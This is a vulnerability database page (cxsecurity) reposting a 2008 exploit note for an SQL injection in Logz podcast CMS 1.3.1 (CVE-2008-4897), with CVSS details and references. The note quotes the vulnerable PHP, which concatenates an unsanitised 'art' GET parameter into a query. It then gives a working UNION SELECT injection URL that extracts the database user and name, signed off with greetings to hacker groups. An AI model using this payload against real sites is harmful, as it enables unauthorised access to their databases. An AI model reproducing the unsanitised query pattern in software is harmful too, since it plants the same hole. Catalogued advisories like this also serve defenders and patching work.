Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability
2008.11.05
Credit:
ZoRLu
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2008-4897
CWE:
CWE-89
CVSS Base Score:
6.8/10
Impact Subscore:
6.4/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
[~] Logz podcast CMS version 1.3.1 Remote sql inj [~] [~] download: http://sourceforge.net/project/showfiles.php?group_id=107225&package_id=178479&release_id=635701 [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 31.10.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] N0T: a.q kpss : ) ) [~] [~] ----------------------------------------------------------- file: fichiers/add_url.php code: if (isset($_GET['art'])) { $Article = $_GET['art']; ... $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions; $ResultRequete = requete_mysql($Requete); Exploit: http://localhost/script_path/fichiers/add_url.php?art=[SQL] [SQL]= column number 1 (SELECT TITRE FROM ...) 1'+union+select+concat(user(),0x3a,database())/* example: http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/* [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------
References:
http://www.securityfocus.com/bid/32022
http://www.milw0rm.com/exploits/6896
http://secunia.com/advisories/32542
http://packetstormsecurity.org/0810-exploits/logzpodcast-sql.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2025
, cxsecurity.com
Back to Top